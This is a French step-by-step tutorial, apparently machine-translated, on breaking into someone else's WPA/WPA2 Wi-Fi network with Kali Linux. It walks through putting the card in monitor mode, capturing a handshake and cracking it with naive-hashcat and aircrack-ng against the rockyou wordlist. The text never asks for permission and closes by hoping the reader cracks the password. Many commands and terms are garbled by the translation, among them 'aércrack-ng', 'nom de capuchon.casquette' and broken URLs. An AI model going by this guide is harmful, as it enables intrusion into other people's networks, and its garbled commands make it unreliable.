Introduction
La fidélité sans fil, ou Wi-Fi, est un type de technologie utilisée pour fournir une connectivité à un réseau informatique sans câble ou connexion câblée. Wi-Fi travaille dans les 2.4 GHz à 5 GHz et ne doit pas interférer avec les téléphones portables, la radio diffusée, la télévision ou les radios portables. Wi-Fi fonctionne en transmettant des données sur des ondes radio entre un appareil client et un appareil appelé routeur. Un routeur peut transmettre des données aux systèmes en interne ou à l'extérieur vers Internet. Le Wi-Fi n'est ni plus ni moins sécurisé qu'un réseau traditionnel câblé mais est plutôt une interface complètement différente. La chose la plus importante à retenir est que la confidentialité équivalente filaire (WEP) a été publiée en 1997 et est facile à pénétrer dans. WEP peut être cassé en quelques minutes ou moins. Vos appareils modernes ne fonctionneront pas avec le réseau WEP et la plupart des routeurs ne le soutiennent plus. Le WEP mis à jour peut également être divisé par des méthodes de piratage.
Le piratage
Autrement dit, pour se fissurer ou pénétrer dans les informations personnelles de quelqu'un est connu sous le nom de piratage. Les pirates peuvent facilement accéder à votre appareil ou ordinateur personnel. Ils peuvent casser vos codes de passe et accéder à votre réseau sans fil. Ils peuvent contourner la sécurité du réseau sans fil et pénétrer, quel que soit le type de cryptage que l'utilisateur utilise.
En règle générale, si vous voulez pénétrer dans le réseau sans fil de quelqu'un, vous devrez d'abord connaître le chiffrement utilisé. Comme mentionné précédemment, le réseau de type WPE n'a pas été sécurisé depuis un certain temps. Il peut généralement être pénétré en quelques minutes. Il en va de même avec le réseau WPA si vous utilisez un mot de passe faible. Cependant, si vous utilisez un mot de passe fort, il est relativement sécurisé, à l'exception de la broche WPS7. Il s'agit d'une vulnérabilité de base matérielle que de nombreux routeurs utilisent, permettant aux pirates d'obtenir la broche qui offre un accès complet au routeur. Il s'agit généralement d'un numéro à huit chiffres écrit au bas du routeur. Vous pouvez dériver ce numéro en suivant les étapes ci-dessous.
Open Kali Linux Terminal
La première étape consiste à ouvrir simplement le terminal Kali Linux. Pour ce faire, appuyez Alt + ctrl + t. Vous pouvez également appuyer sur l'icône de l'application Terminal pour ouvrir le terminal.
Entrez la commande pour l'installation Aircrack-NG
L'étape suivante consiste à installer Aircrack-ng. Entrez la commande suivante pour le faire:
$ sudo apt-get install aércrack-ng
Entrez le mot de passe pour vous connecter
Entrez votre mot de passe racine pour permettre l'accès. Après avoir saisi le mot de passe de connexion, appuyez sur le Entrer bouton pour continuer.
Installer Aircrack-NG
Peu de temps après vous connecter, appuyez sur le bouton Y. Cela permettra l'installation de Aircrack-ng.
Activer Airmon-ng
Airmon-NG est le logiciel utilisé pour convertir le mode géré en mode Monitor. Utilisez la commande suivante pour activer Airmon-NG:
$ Airmon-ng
Trouver le nom du moniteur
L'étape suivante consiste à trouver le nom du moniteur pour continuer à pirater. Vous pouvez afficher le nom du moniteur dans la colonne d'interface. Dans certains cas, vous ne pourrez peut-être pas afficher le nom du moniteur. Cette erreur se produit si votre carte n'est pas prise en charge.
Commencer à surveiller le réseau
Entrez la commande suivante pour commencer le processus de surveillance:
$ Airmon-ng start wlan0
Si vous ciblez un autre réseau, vous devez remplacer «Wlan0» par le nom du réseau correct.
Activer l'interface du mode moniteur
La commande suivante est utilisée pour activer l'interface du mode Monitor:
$ iwconfig
Tuer des processus qui renvoient les erreurs
Votre système peut provoquer une interférence. Utilisez la commande suivante pour supprimer cette erreur.
$ Airmon-ng Check Kill
Examiner l'interface du moniteur
L'étape suivante consiste à revoir le nom du moniteur. Dans ce cas, il est nommé 'Wlan0mon.'
Obtenez des noms de tous les routeurs
Les noms de tous les routeurs disponibles apparaîtront après avoir saisi la commande suivante.
$ Airodump-ng mon0
Trouvez le nom du routeur
Vous devrez d'abord trouver le nom du routeur spécifique que vous souhaitez pirater.
Assurez-vous que le routeur utilise la sécurité WPA ou WPA2
Si le nom WPA apparaît à l'écran, vous pouvez continuer à pirater.
Notez l'adresse MAC et le numéro de canal.
Ce sont les informations de base sur le réseau. Vous pouvez les voir sur le côté gauche du réseau.
Surveiller le réseau sélectionné
Utilisez la commande suivante pour surveiller les détails du réseau que vous souhaitez pirater.
$ AiroDump-NG -C Channel - BSSID Mac -W / Root / Desktop / Mon0
Attendre la poignée de main
Attendez que vous voyiez «WPA Handshake» écrit sur votre écran.
Quittez la fenêtre en appuyant sur Ctrl + c. Un fichier CAP apparaîtra sur l'écran de votre ordinateur.
Renommer le fichier CAP
Pour votre facilité, vous pouvez modifier le nom du fichier. Utilisez la commande suivante à cet effet:
$ mv ./ -01.nom de capuchon.casquette
Convertir le fichier au format HCCAPX
Vous pouvez facilement convertir le fichier en format HCCAPX à l'aide du convertisseur Kali.
Utilisez la commande suivante pour le faire:
$ cap2hccapx.nom de bac.nom de capuchon.HCCAPX
Installer naïf-hash-cat
Maintenant, vous pouvez casser le mot de passe en utilisant ce service. Utilisez la commande suivante pour commencer à craquer.
$ sudo git clone https: // github.com / Brannondorsey / Naive-Hashcat
$ CD naïf-Hash-Cat
$ curl -l -o dicts / rockyou.SMS
Courir naïf-hash-cat
Pour exécuter le service Naive-Hash-Cat, entrez la commande suivante:
$ Hash_file = nom.hccapx pot_file = nom.Pot Hash_Type = 2500 ./ naïf-hash-cat.shot
Attendez que le mot de passe du réseau soit fissuré
Dès que le mot de passe est craqué, il sera mentionné dans le fichier. Ce processus peut prendre des mois ou même des années pour terminer. Entrez la commande suivante lorsque ce processus est terminé pour enregistrer le mot de passe. Le mot de passe fissuré est affiché dans la dernière capture d'écran.
[cc lang = ”bash” width = ”780"]
$ Aircrack-ng -a2 -b mac -w rockyou.nom txt.casquette
[CC]
Conclusion
En utilisant Kali Linux et ses outils, le piratage peut devenir facile. Vous pouvez facilement accéder aux mots de passe en suivant simplement les étapes énumérées ci-dessus. Espérons que cet article vous aidera à casser le mot de passe et à devenir un pirate éthique.